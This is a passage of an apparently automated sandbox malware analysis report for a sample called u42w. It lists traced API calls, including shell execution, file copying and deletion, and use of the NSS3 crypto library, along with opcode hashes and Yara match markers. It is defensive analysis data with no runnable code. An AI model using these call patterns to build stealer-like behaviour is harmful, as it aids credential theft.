                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6C97D079,00000000,00000001), ref: 6C97CDB6
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C97D079,00000000,00000001), ref: 6C97CDCF
                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,6C97D079,00000000,00000001), ref: 6C97CDE2
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C97CDE9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1720798025-0
                                                                                                                                                                                                                              • Opcode ID: 3ca82860aebc9df1367c67ebaf58cf3e0d49bc197cc0636597b1f58a6ae9a536
                                                                                                                                                                                                                              • Instruction ID: 9b543faa3158f8f0a77e16f37393be65bb2c00ee062023ab0c3c59e8ea05e8bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca82860aebc9df1367c67ebaf58cf3e0d49bc197cc0636597b1f58a6ae9a536
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7011CAB2B01216ABEF10AF95ED45A96777DFF1425C7144121E90987E01E733E864C7E1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6C9E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C9E5B56
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9E2CEC
                                                                                                                                                                                                                                • Part of subcall function 6C9FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9FC2BF
                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C9E2D02
                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6C9E2D1F
                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C9E2D42
                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6C9E2D5B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                                                                              • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                              • Instruction ID: 704d6d62207a7ca47fee4cfc2e892cfe42ec34ae44cf73041cf22774e54c2ca5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1701A1B1A046019BE7319E26FC40BD7B7A6EF69318F004535E95E86B20E632E859C792
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CA6A6D8), ref: 6CA6AE0D
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CA6AE14
                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6CA6A6D8), ref: 6CA6AE36
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CA6AE3D
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,00000000,?,?,6CA6A6D8), ref: 6CA6AE47
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 682657753-0
                                                                                                                                                                                                                              • Opcode ID: 3c671e1881c34f87b54b649f0fe4a549d3418fef115f7ab3ec889ec44f4ff055
                                                                                                                                                                                                                              • Instruction ID: db35235ee7701165b22c4a1fa697554efe7482fa09dcd1a765dcd1dfe404c548
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c671e1881c34f87b54b649f0fe4a549d3418fef115f7ab3ec889ec44f4ff055
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF0FC75201B1757DA049FE5E40892B7779BF457787144328E12A83940D737E512C7D1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185B3
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
                                                                                                                                                                                                                                • Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C
                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004185CA
                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004185D8
                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004185E8
                                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 004185FC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                                              • Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                              • Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C8E6D36
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8E6D20
                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C8E6D2F
                                                                                                                                                                                                                              • database corruption, xrefs: 6C8E6D2A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                                                                              • Opcode ID: 82446d8ea004bb29120a5145ec39d91a7d34c78fa9c22031661388b82d650c07
                                                                                                                                                                                                                              • Instruction ID: 824aff722d9cada2b55c270628a39e8bf355ce5a1e3dd4394ba38065cfd2383b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82446d8ea004bb29120a5145ec39d91a7d34c78fa9c22031661388b82d650c07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C221E5707003099BC7208E19DA41B5AB7F6BF4A319F54492CD9499BF51E372F98487A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00413415
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                                                                                                              • Opcode ID: 506305d3720733ee5bab3c9d26159c4130547b258465aef6203612f55fa41ddd
                                                                                                                                                                                                                              • Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 506305d3720733ee5bab3c9d26159c4130547b258465aef6203612f55fa41ddd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6CA1CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CA1CC7B), ref: 6CA1CD7A
                                                                                                                                                                                                                                • Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CA1CD8E
                                                                                                                                                                                                                                • Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CA1CDA5
                                                                                                                                                                                                                                • Part of subcall function 6CA1CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CA1CDB8
                                                                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CA1CCB5
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CAB14F4,6CAB02AC,00000090), ref: 6CA1CCD3
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6CAB1588,6CAB02AC,00000090), ref: 6CA1CD2B
                                                                                                                                                                                                                                • Part of subcall function 6C939AC0: socket.WSOCK32(?,00000017,6C9399BE), ref: 6C939AE6
                                                                                                                                                                                                                                • Part of subcall function 6C939AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C9399BE), ref: 6C939AFC
                                                                                                                                                                                                                                • Part of subcall function 6C940590: closesocket.WSOCK32(6C939A8F,?,?,6C939A8F,00000000), ref: 6C940597
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                                                                              • Opcode ID: 9b2188abffe4471297084dac998a9b048ae064bc09d84114026fa6f0d8163ca5
                                                                                                                                                                                                                              • Instruction ID: 162d81c4115327cad2d90a4646ceafcd461c8548bb683692fb80484d8e509b44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b2188abffe4471297084dac998a9b048ae064bc09d84114026fa6f0d8163ca5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2411B4F1B003415EDB049F5E8E06BA23AB89356208F145239E70ADBF61E771D48A4BD9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                                                                                                              • Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                              • Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDE8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDFC
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CE75
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                              • Opcode ID: c1857c6a5c231edcfa34ebdfcff9ac67d93d66d9a968bca05162a8460d565fbb
                                                                                                                                                                                                                              • Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1857c6a5c231edcfa34ebdfcff9ac67d93d66d9a968bca05162a8460d565fbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000,?,6C98C97F,?,?,?), ref: 6C9A04BF
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,?,6C98C97F,?,?,?), ref: 6C9A04F4
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6C98C97F,?,?,?), ref: 6C9A050D
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,6C98C97F,?,?,?), ref: 6C9A0556
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 349578545-0
                                                                                                                                                                                                                              • Opcode ID: 514055ebe73f3607c81a16725c0c82ba258886c21a6688c280160f8250ae1942
                                                                                                                                                                                                                              • Instruction ID: fdecd55835aeb41cafe3c461619d8f18709e3961c5c137dfff9d2844a2bf94c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 514055ebe73f3607c81a16725c0c82ba258886c21a6688c280160f8250ae1942
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD416DB4A056428FDB04DF6AC580669BBF4FF44318F15A56DD89A8BB01E730E892CF80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C956C8D
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C956CA9
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C956CC0
                                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CA78FE0), ref: 6C956CFE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2370200771-0
                                                                                                                                                                                                                              • Opcode ID: e5d6b70463ca04860aa1a03ea05dd4124cd5b6bd3c657077ca1b97cddec97a3c
                                                                                                                                                                                                                              • Instruction ID: e4068481f6de88cf711b3a4c5f74836312ea756e50fa8388a82b1c8a104c720f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5d6b70463ca04860aa1a03ea05dd4124cd5b6bd3c657077ca1b97cddec97a3c
